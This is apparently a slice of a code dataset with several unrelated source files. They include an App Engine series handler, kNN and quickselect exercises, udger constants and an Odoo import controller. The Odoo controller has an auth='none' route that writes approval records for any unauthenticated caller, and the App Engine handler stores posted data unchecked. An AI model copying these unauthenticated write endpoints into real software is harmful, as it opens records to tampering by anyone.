txt=txt+\"|\"+nibbles+\"|\"+str(noteperiod)\n offset=offset+4\n pattern.append(row)\n patterns.append(pattern)\n\n fmt = '%2d, offset %6d, len %5d'\n for i, sample in enumerate(samples):\n sample_len=sample[\"len\"]\n # first two bytes always two zeros, and used for repeating is\n # the sample is to be terminated.\n sample_data=barr[offset+2:offset+sample_len]\n 
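# keep the raw sample bytes on the record so they can be played or exported later\n 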
sample['data'] = sample_data\n DP.print(fmt, (i, offset, sample_len))\n offset = offset+sample_len\n if offset != len(barr):\n print(\"ERROR....NOT ALL BYTES PROCESSED! \",\n len(barr)-offset, \"remain.\")\n DP.leave()\n return True\n","sub_path":"modtrack/loadmod.py","file_name":"loadmod.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132159810","text":"'''\nThis script adds entry to the database Series.\nThis script is used by Admin to reset the database to default value.\n'''\nfrom google.appengine.ext import db\nimport webapp2\nimport json\nimport logging\n\nclass Series(db.Model):\n tvid = db.StringProperty(required=True)\n title = db.StringProperty(required=True)\n status = db.IntegerProperty()\n epname = db.StringProperty()\n epinfo = db.StringProperty()\n epdate = db.StringProperty()\n rely = db.IntegerProperty()\n up_cycle = db.IntegerProperty()\n\nclass Add2Series(webapp2.RequestHandler):\n def get(self):\n logging.info(\"GET request received\")\n query = Series.all()\n query.order(\"tvid\") \n\n for q in query.run():\n self.response.write(q.tvid)\n self.response.write(\"\\t\")\n self.response.write(q.title)\n self.response.write(\"\\t\")\n self.response.write(q.status)\n self.response.write(\"\\n\")\n self.response.write(q.epname)\n self.response.write(\"\\n\")\n self.response.write(q.epinfo)\n self.response.write(\"\\n\")\n self.response.write(q.epdate)\n self.response.write(\"\\n\")\n self.response.write(q.rely)\n self.response.write(\"\\n\")\n\n logging.info(\"Request Successfully Executed\")\n\n def post(self):\n logging.info(\"POST Request received\")\n jsbody = self.request.body\n data = json.loads(jsbody)\n\n rtvid = data['tvid']\n rname = data['name']\n rstat = data['status']\n repname = data['epname']\n repinfo = data['epinfo']\n repdate = data['epdate']\n rrely = data['rely']\n rup_cycle = data['up_cycle']\n \n logging.debug(\"name = \" + rname)\n logging.debug(\"tvid = \" + str(rtvid))\n logging.debug(\"status = \" + str(rstat))\n logging.debug(\"epname = \" + repname)\n logging.debug(\"epinfo = \" + str(repinfo))\n logging.debug(\"epdate = \" + str(repdate))\n logging.debug(\"rely = \" + str(rrely))\n logging.debug(\"up_cycle = \" + str(rup_cycle))\n\n ''' \n series = Series.all()\n series.filter('tvid = ', str(rtvid))\n entry = series.get()\n '''\n\n entry = Series(tvid=rtvid, title=rname)\n \n entry.epname = repname\n entry.epinfo = repinfo\n entry.epdate = repdate\n entry.rely = rrely\n entry.status = rstat\n entry.up_cycle = rup_cycle\n \n entry.put()\n\n logging.debug(\"Entry added to Database\")\n logging.info(\"Request successfully executed\")\n\n self.response.write(\"Added \" + rtvid)\n\n\napplication = webapp2.WSGIApplication([(\"/add\", Add2Series),],debug=True)\n","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"547188130","text":"VERSION = '0.2'\n\nPROJECT_HOMEPAGE = 'https://udger.com'\n\nINI_FILE_URL_TEMPLATE = 'http://data.udger.com/{access_key}/udgerdata_old.ini'\n\nDEFAULT_TMP_DIR = '/tmp'\n\nEMPTY_RESULT = {\n 'type': None,\n 'ua_family': None,\n 'ua_name': None,\n 'ua_url': None,\n 'ua_company': None,\n 'ua_company_url': None,\n 'ua_icon': PROJECT_HOMEPAGE + '/pub/img/ua/unknown.png',\n 'ua_udger_url': None,\n 'device_name': None,\n 'device_icon': PROJECT_HOMEPAGE + '/pub/img/device/unknown.png',\n 
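# device/os fields mirror the ua_* block: None plus a generic 'unknown' icon until a lookup fills them in\n 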
'device_udger_url': None,\n 'os_family': None,\n 'os_name': None,\n 'os_url': None,\n 'os_company': None,\n 'os_company_url': None,\n 'os_icon': PROJECT_HOMEPAGE + '/pub/img/os/unknown.png',\n}\n","sub_path":"udger/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"570037665","text":"import numpy as np\nfrom scipy.spatial import distance\nimport pickle\nimport numpy as np\nimport math\nfrom collections import Counter\n\n###Distance Metric : L2 ###\nclass KNearestNeighbor(object):\n \"\"\" a kNN classifier with L2 distance \"\"\"\n\n def __init__(self):\n pass\n\n def train(self, X, y):\n \"\"\"\n \n \"\"\"\n self.X_train = X\n self.y_train = y\n \n def predict(self, X, k):\n \n dists=self.compute_distances(X)\n return self.predict_labels(dists, k=k)\n \n \n def compute_distances(self, X):\n\n val = X.toarray()\n train = self.X_train.toarray()\n dists = [[] for i in range(len(val))]\n\n for i in range(0,len(val)):\n for j in range(0,len(train)):\n distances = distance.euclidean(val[i],train[j])\n dists[i].append([distances,self.y_train[j]])\n \n return dists\n\n def predict_labels(self, dists,k):\n \n y_pred = []\n for i in range(0,len(dists)):\n res_list = []\n k_smallest = []\n \n dists[i]=sorted(dists[i], key=lambda x: x[0])\n \n for j in range(0,k):\n k_smallest.append(dists[i][j]) \n count = Counter([x[1] for x in k_smallest])\n y_pred.append(count.most_common()[0][0])\n \n return y_pred\n\n","sub_path":"k_nearest_neighbor.py","file_name":"k_nearest_neighbor.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"505949585","text":"#\n# select returns the k-th smallest element of a\n#\ndef select(a, k):\n b = sorted(a)\n return b[k]\n\n# Implement the function quick_select.\n# It also returns the k-th smallest element of a.\ndef partition(a, lo, hi):\n p = (lo + hi)//2\n pivot = a[p]\n a[p] = a[hi] # Swap pivot with last item\n a[hi] = pivot\n\n i = lo - 1\n j = hi\n while i < j: \n i += 1 \n while a[i] < pivot: \n i += 1\n j -= 1\n while a[j] > pivot and j > lo: \n j -= 1\n if i < j:\n a[i], a[j] = a[j], a[i]#t = a[i]; a[i] = a[j]; a[j] = t # swap a[i] and a[j]\n a[hi] = a[i]\n a[i] = pivot # Put pivot where it belongs\n return i # index of pivot\n\ndef qs(a, k, lo, hi):\n if lo < hi:\n pivotIndex = partition(a, lo, hi)\n if pivotIndex == k:\n return a[k]\n elif pivotIndex > k:\n return qs(a, k, lo, pivotIndex - 1)\n return qs(a, k, pivotIndex + 1, hi)\n return a[k]\n\ndef quick_select(a, k):\n return qs(a, k, 0, len(a)-1)\n\n","sub_path":"CS206_DS/8_selection.py","file_name":"8_selection.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"71292906","text":"# Filename: q5_compute_series.py\n# Author: Ang Yong Loong\n# Class: 5C23\n# Created: 20022013\n# Modified: 20022013\n# Description: Program to compute series\n\ndef m(i):\n a = 1\n answer = 0\n while a<=i:\n answer= answer + 1/(2*a-1) - 1/(2*a+1)\n a=a+2\n answer = 4*answer\n return(answer)\n\n#main\nprint(\"i m(i)\")\nfor x in range(1,20,2):\n print('{0:<5}'.format(x),'{0:<10.11f}'.format(m(x)))\n\ninput(\"\\n\\nPlease hit the enter key to 
exit.\")\nexit()\n","sub_path":"practical03/q5_compute_series.py","file_name":"q5_compute_series.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"544284907","text":"def isPalin(given):\n return str(given)==str(given)[::-1]\ndef bruteForce():\n a, b = 999, 999;\n largest = 0;\n while(a > 99):\n while(b > 99):\n if(a*b > largest):\n if(isPalin(a*b)):\n largest = a*b\n else: break;\n b -= 1;\n a -= 1;\n b = 999;\n return largest;\nprint(bruteForce());\n","sub_path":"project_euler4.py","file_name":"project_euler4.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"102481781","text":"# -*- coding: utf-8 -*-\nimport xlrd\nimport os\n\nimport odoo\nimport logging\nimport xlwt\n\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT as DATETIME_FORMAT, DEFAULT_SERVER_DATE_FORMAT as DATE_FORMAT\nfrom odoo.exceptions import ValidationError\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom odoo.addons.web_export_view_good.controllers.controllers import ExcelExportView, content_disposition\nfrom odoo.addons.anxe_property.models.property_contract import COMPUTE_PERIOD\n\nimport json\n\n_logger = logging.getLogger(__name__)\n\n\ndef clean_excel_rows(rs):\n for i, r in enumerate(rs):\n if isinstance(r, str) or isinstance(r, unicode):\n rs[i] = r.replace('\\n', '').strip()\n\n\ndef get_customer_id(n):\n partner_obj = request.env['partner'].sudo()\n company_obj = request.env['res.company'].sudo()\n # 获取商户\n if not n:\n return False\n c_category_id = request.env.ref('anxe_core.customer_category_1').id\n r = partner_obj.search([('name', '=', n), ('c_category_id', '!=', False)], limit=1)\n if not r:\n # 创建对应公司\n c = company_obj.create({\n 'name': n,\n 'street': '0',\n 'phone': '0'\n })\n r = partner_obj.create({'name': n, 'c_category_id': c_category_id, 'main_mobile': '0', 'company_id': c.id})\n return r.id\n\n\ndef get_supplier_id(n):\n partner_obj = request.env['partner'].sudo()\n if not n:\n return False\n s_category_id = request.env.ref('anxe_core.supplier_category_1').id\n r = partner_obj.search([('name', '=', n), ('s_category_id', '!=', False)], limit=1)\n if not r:\n r = partner_obj.create({'name': n, 's_category_id': s_category_id, 'main_mobile': '0', 'company_id': 1})\n return r.id\n\n\ndef get_core_value_id(n, t):\n core_value_obj = request.env['core.value'].sudo()\n if not n or not t:\n return False\n\n r = core_value_obj.search([('name', '=', n), ('type', '=', t)], limit=1)\n if not r:\n return False\n\n return r.id\n\n\nclass ErpExtension(http.Controller):\n pass\n\n # @http.route('/web/import_data/generate_fee_detail/', type='http', auth=\"none\")\n # def generate_fee_detail(self):\n # \"\"\"生成合同费用\"\"\"\n # contract_obj = request.env['property.contract'].sudo()\n #\n # time_now = datetime.now()\n #\n # dt = datetime(2017, 1, 1)\n # # dt = datetime(2017, 8, 29)\n # while 1:\n # print(dt)\n # contract_obj.contract_fee_generate(dt=dt.strftime(DATE_FORMAT))\n # dt = dt + relativedelta(days=7)\n # if dt > time_now:\n # break\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/rent_account/', type='http', auth=\"none\")\n # def import_arrears_obj(self):\n # # 导入往期欠费\n # arrears_obj = request.env['arrears'].sudo()\n # partner_obj = request.env['partner'].sudo()\n #\n # 
path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'rent_account.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n # for i in range(nrows):\n # # print i\n # if i < 1:\n # continue\n # row = table.row_values(i)\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # partner_name = row[0] # 商户全称\n # arrears_money = row[1] # 欠款金额\n # fee_name = row[2] #费用类型\n # if not partner_name:\n # continue\n # partner = partner_obj.search([('name','=',partner_name)], limit=1)\n # if not partner:\n # print partner_name\n # # raise ValidationError(u'%s商户错误'%partner_name)\n # continue\n # arrears_obj.create({\n # 'partner_id': partner.id,\n # 'arrears_money': arrears_money,\n # 'fee_id': get_core_value_id(fee_name, 'shop_fee_type'),\n # })\n #\n # @http.route('/web/import_data/partner_shop/', type='http', auth=\"none\")\n # def import_partner_shop(self):\n # \"\"\"导入店铺\"\"\"\n # shop_obj = request.env['partner.shop'].sudo()\n # region_obj = request.env['partner.shop.region'].sudo()\n #\n # def get_region_id(n):\n # # 获取楼层区域\n # if not n:\n # return False\n # r = region_obj.search([('name', '=', n)], limit=1)\n # if not r:\n # r = region_obj.create({'name': n})\n # return r.id\n #\n # def get_cooperative_nature(n):\n # # 获取合作性质\n # if not n:\n # return False\n # if u'租用' in n:\n # r = 'rent'\n # elif u'物业托管' in n:\n # r = 'trusteeship'\n # elif u'联营' in n:\n # r = 'union'\n # else:\n # r = False\n # return r\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'partner_shop4.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n # for i in range(nrows):\n # print i\n # if i < 3:\n # continue\n # row = table.row_values(i)\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # region_name = row[0] # 楼层区域\n # shop_code = row[1] # 铺位编号\n # shop_name = row[2] # 铺位名称\n # area = row[3] # 商用面积\n # public_area = row[4] # 租赁面积(含公摊)\n # cooperative_nature_name = row[5] # 合作性质\n # belong_to = row[6] # 归属主体\n # attract_investment = row[7] # 招商主体\n # property_management = row[8] # 物业管理主体\n # business_management = row[9] # 商管主体\n #\n # if not shop_code:\n # continue\n # if isinstance(shop_code, float):\n # shop_code = str(int(shop_code))\n #\n # partner_shop = shop_obj.search([('code', '=', shop_code)], limit=1)\n #\n # if partner_shop:\n # continue\n #\n # shop_obj.create({\n # 'region_id': get_region_id(region_name),\n # 'code': shop_code,\n # 'name': shop_name,\n # 'area': area,\n # 'public_area': public_area,\n # 'cooperative_nature': get_cooperative_nature(cooperative_nature_name),\n # 'belong_to': belong_to,\n # 'attract_investment': attract_investment,\n # 'property_management': property_management,\n # 'business_management': business_management,\n # })\n #\n # if i % 10 == 0:\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/contract/', type='http', auth=\"none\")\n # def import_contract(self):\n # \"\"\"导入合同\"\"\"\n # contract_obj = request.env['property.contract'].sudo()\n # shop_obj = request.env['partner.shop'].sudo()\n # contract_fee_obj = request.env['contract.fee'].sudo()\n # contract_bond_obj = request.env['contract.bond'].sudo()\n #\n # def get_compute_period(n):\n # if not n:\n # return False\n # if n == u'月':\n # r = 'month'\n # elif n in [u'季', u'季度']:\n # r = 'quarterly'\n # elif n == u'半年':\n # r = 'six_months'\n # elif n == u'年':\n # r = 'year'\n # elif n == u'一次性缴纳':\n # r = 'once'\n # else:\n # r = False\n # return r\n 
#\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'contract4.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n #\n # # 上一个合同\n # before_contract = None\n #\n # for i in range(nrows):\n # print i\n # if i < 2:\n # continue\n # row = table.row_values(i)\n #\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # pay_partner_name = row[0] # 商家名称\n # shop_codes = row[1] # 店铺编号\n # partner_contact_person = row[2] # 商家联系人\n # partner_contact_phone = row[3] # 联系电话\n # public_area = row[4] # 签约面积\n # date_from = row[5] # 合同开始日期\n # date_to = row[6] # 合同截止日期\n # get_partner_name = row[7] # 合同签订方(甲方)\n # merchant_reception = row[8] # 商户对接人\n # # 合同费用\n # fee_name = row[9] # 费用类型\n # amount = row[10] # 费用金额\n # compute_period_name = row[11] # 收取方式\n # fee_date_from = row[12] # 开始时间\n # fee_date_to = row[13] # 截止时间\n # note = row[14] # 导入备注\n #\n # if note != u'无合同商户':\n # continue\n #\n # if isinstance(partner_contact_phone, float):\n # partner_contact_phone = str(int(partner_contact_phone))\n #\n # date_from = xlrd.xldate.xldate_as_datetime(date_from, 0).strftime(DATE_FORMAT) if date_from else '2017-01-01'\n # date_to = xlrd.xldate.xldate_as_datetime(date_to, 0).strftime(DATE_FORMAT) if date_to else False\n # fee_date_from = xlrd.xldate.xldate_as_datetime(fee_date_from, 0).strftime(DATE_FORMAT) if fee_date_from else False\n # fee_date_to = xlrd.xldate.xldate_as_datetime(fee_date_to, 0).strftime(DATE_FORMAT) if fee_date_to else False\n #\n # if shop_codes:\n # # 第一行\n # if pay_partner_name == u'未售':\n # continue\n #\n # pay_partner_id = get_customer_id(pay_partner_name)\n # shop_codes = shop_codes.split('/')\n # shops = shop_obj.search([('code', 'in', shop_codes)])\n # if not shops:\n # raise ValidationError(u'门店编号错误')\n #\n # contract = contract_obj.create({\n # 'pay_partner_id': pay_partner_id,\n # 'partner_shop_ids': [(6, 0, shops.ids)],\n # 'partner_contact_person': partner_contact_person,\n # 'partner_contact_phone': partner_contact_phone,\n # 'public_area': public_area,\n # 'date_from': date_from or False,\n # 'date_to': date_to or False,\n # 'get_partner_id': get_supplier_id(get_partner_name),\n # 'merchant_reception': merchant_reception,\n # 'state': 'done',\n # 'note': note,\n # })\n #\n # before_contract = contract\n #\n # # 合同费用\n # if not fee_name:\n # continue\n #\n # # 保证金\n # if fee_name == u'合同保证金':\n # contract_bond_obj.create({\n # 'contract_id': before_contract.id,\n # 'amount': amount,\n # 'done': True if compute_period_name == u'已缴纳' else False\n # })\n # else:\n # charging_method = 'auto'\n # if compute_period_name in [u'月结扣点', u'水费', u'电费']:\n # charging_method = 'not_auto'\n #\n # contract_fee_obj.create({\n # 'contract_id': before_contract.id,\n # 'fee_id': get_core_value_id(fee_name, 'shop_fee_type'),\n # 'charging_method': charging_method,\n # 'amount': amount,\n # 'compute_period': get_compute_period(compute_period_name),\n # 'date_from': fee_date_from or False,\n # 'date_to': fee_date_to or False,\n # })\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/shop_equipment/', type='http', auth=\"none\")\n # def import_shop_equipment(self):\n # \"\"\"导入抄表设备\"\"\"\n # equipment_obj = request.env['shop.equipment'].sudo()\n # shop_obj = request.env['partner.shop'].sudo()\n #\n # def get_equipment_type(n):\n # r = False\n # if n == u'水表':\n # r = 'water'\n # elif n == u'电表':\n # r = 'electricity'\n # return r\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = 
xlrd.open_workbook(path + os.path.sep + 'shop_equipment.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n #\n # for i in range(nrows):\n # print i\n # if i < 2:\n # continue\n # row = table.row_values(i)\n #\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # shop_code = row[1] # 铺位编号\n # equipment_code = row[2] # 设备编号\n # equipment_type = row[3] # 设备类型\n # multiple_rate = row[4] # 倍率\n # brand = row[5] # 品牌\n # xh = row[6] # 型号\n # installation_date = row[7] # 安装时间\n # administrators = row[8] # 设备管理人\n #\n # if not equipment_code:\n # continue\n #\n # if isinstance(shop_code, float):\n # shop_code = str(int(shop_code))\n #\n # if isinstance(equipment_code, float):\n # equipment_code = str(int(equipment_code))\n #\n # installation_date = xlrd.xldate.xldate_as_datetime(installation_date, 0).strftime(DATE_FORMAT) if installation_date else False\n # if equipment_obj.search([('code', '=', equipment_code)]):\n # continue\n # shop = shop_obj.search([('code', '=', shop_code)], limit=1)\n #\n # if not shop:\n # print(u'%s行,%s店铺没有找到' % (i+1, shop_code))\n # raise ValidationError(u'%s行,%s店铺没有找到' % (i+1, shop_code))\n #\n # equipment_obj.create({\n # 'shop_id': shop.id if shop else False,\n # 'code': equipment_code,\n # 'type': get_equipment_type(equipment_type),\n # 'multiple_rate': multiple_rate,\n # 'brand': brand,\n # 'installation_date': installation_date,\n # 'administrators': administrators,\n # })\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/money_get_record/', type='http', auth=\"none\")\n # def import_money_get_record(self):\n # \"\"\"收款记录\"\"\"\n # money_record_obj = request.env['money.record'].sudo()\n # partner_obj = request.env['partner'].sudo()\n # bank_account_obj = request.env['bank.account'].sudo()\n # money_order_obj = request.env['money.order'].sudo()\n #\n # path = os.path.dirname(os.path.abspath(__file__))\n #\n # data = xlrd.open_workbook(path + os.path.sep + 'money_get_record.xlsx')\n # table = data.sheet_by_index(0)\n # nrows = table.nrows\n #\n # for i in range(nrows):\n # print i\n # if i != 2:\n # continue\n # row = table.row_values(i)\n #\n # # 去除换行和空格\n # clean_excel_rows(row)\n #\n # partner_name = row[0] # 商户\n # amount = row[1] # 实际付款金额\n # period = row[2] # 缴纳费用期间\n # fee_use = row[3] # 缴纳费用用途\n # bank_account_name = row[4] # 收款方式\n # receive_number = row[5] # 入账账号\n # fee_time = row[6] # 缴费时间\n #\n # partner = partner_obj.search([('name', '=', partner_name)], limit=1)\n # if not partner:\n # raise ValidationError(u'商户:%s不存在' % partner_name)\n #\n # if isinstance(fee_time, float):\n # fee_time = str(int(fee_time))\n #\n # if fee_time:\n # try:\n # fee_time = datetime.strptime(fee_time, '%Y%m%d')\n # except Exception:\n # fee_time = datetime.strptime(fee_time, '%Y%m')\n # else:\n # fee_time = datetime.now()\n #\n # partner = partner_obj.search([('name', '=', partner_name)], limit=1)\n # if not partner:\n # raise ValidationError(u'%s用户不存在' % partner_name)\n #\n # bank_account = bank_account_obj.search([('name', '=', bank_account_name)], limit=1)\n # if not bank_account:\n # bank_account = bank_account.search([('name', '=', u'银行卡')], limit=1)\n #\n # money_orders = money_order_obj.search([('company_id', '=', 1),\n # ('partner_id', '=', partner.id),\n # ('state', '=', 'draft'),\n # ('type', '=', 'get')])\n #\n # money_record = money_record_obj.create({\n # 'partner_id': partner.id,\n # 'company_id': 1,\n # 'type': 'get',\n # 'bank_id': bank_account.id,\n # 'fee_id': get_core_value_id(fee_use, 'shop_fee_type'),\n # 
'receive_number': receive_number,\n # 'amount': amount,\n # 'fee_time': fee_time,\n # 'money_order_ids': [(6, 0, money_orders.ids)]\n # })\n # # money_record.state_done()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/fee_verify/', type='http', auth=\"none\")\n # def import_fee_verify(self):\n # fee_detail_obj = request.env['contract.fee.detail'].sudo()\n #\n # fee_details = fee_detail_obj.search([('state', '=', 'draft')])\n #\n # for i, f in enumerate(fee_details):\n # print('%s/%s' % (i, len(fee_details)))\n #\n # f.state_done()\n # # if i % 10 == 0:\n # # request.env.cr.commit()\n #\n # print('done')\n #\n # @http.route('/web/import_data/money_record_draft/', type='http', auth=\"none\")\n # def import_money_record_draft(self):\n # money_record_obj = request.env['money.record'].sudo()\n # money_records = money_record_obj.search([('state', '=', 'done')])\n # money_records.state_draft()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/money_record_done/', type='http', auth=\"none\")\n # def import_money_record_done(self):\n # money_record_obj = request.env['money.record'].sudo()\n # money_records = money_record_obj.search([('note', '=', '冲减缴费')], order='fee_time')\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.state_done()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n\n # @http.route('/web/import_data/money_draft/', type='http', auth=\"none\")\n # def import_money_record_draft(self):\n # money_record_obj = request.env['money.record'].sudo()\n # money_records = money_record_obj.search([('note', '=', '冲减缴费')], order='fee_time')\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.state_draft()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('draft')\n # return 'draft'\n\n # @http.route('/web/import_data/arrears_done/', type='http', auth=\"none\")\n # def import_arrears_done(self):\n # arrears_obj = request.env['arrears'].sudo()\n # money_records = arrears_obj.search([('state', '=', 'draft')])\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.arrears_done()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('done')\n # return 'done'\n #\n # @http.route('/web/import_data/arrears_draft/', type='http', auth=\"none\")\n # def import_arrears_draft(self):\n # arrears_obj = request.env['arrears'].sudo()\n # money_records = arrears_obj.search([('state', '=', 'done')])\n # for money_record in money_records:\n # print(money_record)\n # try:\n # money_record.arrears_draft()\n # except Exception:\n # pass\n # request.env.cr.commit()\n # print('draft')\n # return 'draft'\n\n # @http.route('/web/import_data/money_record_update/', type='http', auth=\"none\")\n # def import_money_record_update(self):\n # record_obj = request.env['money.record'].sudo()\n #\n # money_records = record_obj.search([('money_order_ids', '!=', False)])\n # for i, money_record in enumerate(money_records):\n # print('%s/%s' % (i, len(money_records)))\n # if money_record.fee_id:\n # money_record.fee_ids = [money_record.fee_id.id]\n #\n # source_ids = []\n # money_orders = []\n # for money_order_line in money_record.money_order_line_ids:\n # if money_order_line.money_id not in money_orders:\n # money_orders.append(money_order_line.money_id)\n #\n # for money_order in money_orders:\n # for source in money_order.source_ids:\n # if source.fee_id not in money_record.fee_ids:\n # 
continue\n # if money_record.contract_id and money_record.contract_id != source.contract_id:\n # continue\n # source_ids.append(source.id)\n #\n # money_record.source_ids = source_ids\n #\n # print('done')\n # return 'done'\n\n # @http.route('/web/import_data/wy_fee_adjust/', type='http', auth=\"none\")\n # def wy_fee_adjust(self):\n # adjust_obj = request.env['contract.fee.adjust'].sudo()\n # contract_obj = request.env['property.contract'].sudo()\n # contracts = contract_obj.search([])\n # for i, contract in enumerate(contracts):\n # print i\n # name = u'%s物业费调整2:2018.11.1开始' % contract.pay_partner_id.name\n # if adjust_obj.search([('name', '=', name), ('contract_id', '=', contract.id)]):\n # continue\n #\n # adjust = adjust_obj.create({\n # 'name': name,\n # 'contract_id': contract.id,\n # })\n # adjust.onchange_contract_id()\n # for line2 in adjust.line2_ids:\n # if not line2.fee_id:\n # line2.deleted = True\n # continue\n #\n # if line2.fee_id.name not in [u'物业管理费', u'公摊费', u'空调使用费']:\n # continue\n #\n # if not line2.amount:\n # continue\n #\n # if line2.date_to and line2.date_to < '2018-11-01':\n # line2.deleted = True\n # continue\n #\n # if line2.compute_period != 'month':\n # if line2.compute_period == 'quarterly':\n # line2.write({\n # 'compute_period': 'month',\n # 'amount': round(line2.amount / 3, 2)\n # })\n #\n # if line2.date_from < '2018-11-01':\n # line2.date_from = '2018-11-01'\n #\n # # 审核\n # adjust.state_done()\n #\n # if i % 10 == 0:\n # request.env.cr.commit()\n #\n # return 'done'\n\n @http.route('/web/import_data/money_record_tjsp/', type='http', auth=\"none\")\n def money_record_tjsp(self):\n \"\"\"收款记录提交审批\"\"\"\n money_record_obj = request.env['money.record'].sudo()\n approval_state_obj = request.env['record.approval.state'].sudo()\n\n money_records = money_record_obj.search([('state', '=', 'draft')])\n\n for money_record in money_records:\n if not approval_state_obj.search([('model', '=', money_record._name), ('res_id', '=', money_record.id)]):\n approval_state_obj.create({\n 'model': money_record._name,\n 'res_id': money_record.id\n })\n\n return 'done'\n\n\nclass MyExcelExportView(ExcelExportView, http.Controller):\n\n @http.route('/web/export/export_contract', type='http', auth='user')\n def export_contract(self, contract_ids, **kwargs):\n contract_obj = request.env['property.contract'].sudo()\n\n contract_ids = eval(contract_ids)\n\n contracts = contract_obj.search([('id', 'in', contract_ids)])\n\n headers = u'合同清单'\n\n data = {\n \"headers\": [\n headers,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n None,\n ],\n \"files_name\": headers,\n \"rows\": [\n [],\n [\n u\"商家名称(合同乙方)\",\n u\"店铺编号\",\n u\"商家联系人\",\n u\"联系电话\",\n u\"签约面积(m2)\",\n u\"合同开始日期\",\n u\"合同截止日期\",\n u\"合同签订人(甲方)\",\n u\"商户对接人\",\n u\"费用项目\",\n u\"费用金额\",\n u\"收取方式\",\n u\"收费开始\",\n u\"收费截止\",\n ],\n ],\n }\n\n for contract in contracts:\n shop_codes = [shop.code for shop in contract.partner_shop_ids]\n row = [\n contract.pay_partner_id.name or '',\n ','.join(shop_codes) or '',\n contract.partner_contact_person or '',\n contract.partner_contact_phone or '',\n contract.public_area or '',\n contract.date_from or '',\n contract.date_to or '',\n contract.contract_holder or '',\n contract.merchant_reception or '',\n ]\n data['rows'].append(row)\n for i, fee_line in enumerate(contract.fee_ids):\n if i == 0:\n row.append(fee_line.fee_id.name or '')\n row.append(fee_line.amount or '')\n if fee_line.compute_period:\n 
row.append(dict(COMPUTE_PERIOD)[fee_line.compute_period])\n else:\n row.append('')\n row.append(fee_line.date_from or '')\n row.append(fee_line.date_to or '')\n else:\n data['rows'].append([\n [],\n [],\n [],\n [],\n [],\n [],\n [],\n [],\n [],\n fee_line.fee_id.name or '',\n fee_line.amount or '',\n dict(COMPUTE_PERIOD)[fee_line.compute_period] or '',\n fee_line.date_from or '',\n fee_line.date_to or ''\n ])\n\n files_name = data.get('files_name', [])\n columns_headers = data.get('headers', [])\n rows = data.get('rows', [])\n file_address = data.get('file_address', [])\n\n return request.make_response(\n self.from_data_excel(columns_headers, [rows, file_address]),\n headers=[\n ('Content-Disposition', content_disposition(files_name)),\n ('Content-Type', self.content_type)],\n cookies={'fileToken': '1'}\n )\n\n","sub_path":"my_addons/anxe_property/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":29000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"83639800","text":"from vtkplotter import *\nimport numpy as np\n\ndata1 = np.random.randn(500)*3+10\ndata2 = np.random.randn(500)*2+ 7\n\nh1 = histogram(data1, fill=True, outline=False, errors=True)\nh2 = histogram(data2, fill=False, lc='firebrick', lw=4)\nh2.z(0.1) # put h2 in front of h1\n\nh1.scale([1, 0.2, 1]) # set a common y-scaling factor\nh2.scale([1, 0.2, 1])\n\nshow(h1, h2, bg='white', axes=1)","sub_path":"examples/basic/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299560432","text":"#\n# Copyright (c) 2017-2019 University of Antwerp, Aloxy NV.\n#\n# This file is part of OSS-7 Testsuite\n# (see https://github.com/MOSAIC-LoPoW/oss7-testsuite).\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 